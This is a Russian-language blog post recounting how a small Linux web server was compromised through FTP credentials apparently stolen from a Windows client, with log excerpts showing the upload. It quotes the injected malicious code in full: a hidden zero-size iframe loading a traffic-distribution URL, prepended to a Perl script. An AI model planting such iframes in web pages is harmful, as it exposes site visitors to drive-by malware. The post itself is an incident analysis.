небольшая история про самую большую дырку в безопасности серверов на линуксе
несколько месяцев назад построил я людям сервачек, многого от него не требовалось - сайтик чтобы на нем вертелся да и все, ну потом они заххотели в инет через него ходить и еще всякой мелочевки на нем - ну и попутно десктоп для двух человек на нем же (весьма приятно видеть как сразу двое сидят в kde, тамже кучу рамы сожрал апач с мускулом, при этом своп не тронутый и все это на 512 метрах рамы :))
сайтик изнутри писан мною, управляется он как правило по фтп (хотя за какимто хреном пару админских скриптов нарисовать пришлось - но кто бы их пользовал)
и вот на днях звонок - лежит сцайт
лезу туда и наблюдаю 500
ну практически сразу замечаю что последним правлен был index.pl, смотрю в него и наблюдаю
<!-- ~ --><iframe src="http://keywordsstat.ru/tds/iframe.php?u=new2" width=0 height=0 border=0></iframe>
<!-- ~ -->#!/usr/bin/perl
use www;www::ok;
слегка прихожу в ужос - ибо взлом, и взлом явно через какуюто стандартную дырку какимто ботом - в моих скриптах "стандартного" мало - только выхлоп
разглядываю права на все это вокруг - все нормально - писать может юзер под которым вертится suexec (следовательно даже через phpmyadmin туда ничего не напишешь) ну и root, смотрю в лог апача в районе времени правки файла - тишина - до этого какотйо поисковик индекс пощупал и получил 200, после этого другой получил уже 500
в ужосе думаю - неужто рута поимели..., лезу в secure - даже брутили последний раз весьма давно - все успешные заходы - мои, да и опятьже пароли далеко не словарные
тутже рядом замечаю xferlog (я про наличие там фтп както вообще забыл давно - ssh наше все) и в конце него наблюдаю то что и искал
Sun Jun 17 08:58:44 2007 1 85.17.112.1 37 ///index.pl a _ o r **** ftp 0 * c
Sun Jun 17 08:58:44 2007 1 85.17.112.1 154 ///index.pl a _ i r **** ftp 0 * c
и все становится предельно ясно
вирем, с какойто виндовой тачки, из тех кто там по фтп роется были стырины пароли от всего подряд и собственно вот
ну и на следующий день наблюдаю в вот это: http://thg.ru/technews/20070621_114144.html
тем самым или подобным был угнан пароль - не знаю
знаю лишь то - самая большая дыра в линухе - это маздайцы и их маздай
Последние комментарии
9 лет 45 недель назад
10 лет 12 недель назад
10 лет 22 недели назад
10 лет 22 недели назад
11 лет 12 недель назад
11 лет 12 недель назад
11 лет 12 недель назад
11 лет 13 недель назад
11 лет 13 недель назад
11 лет 14 недель назад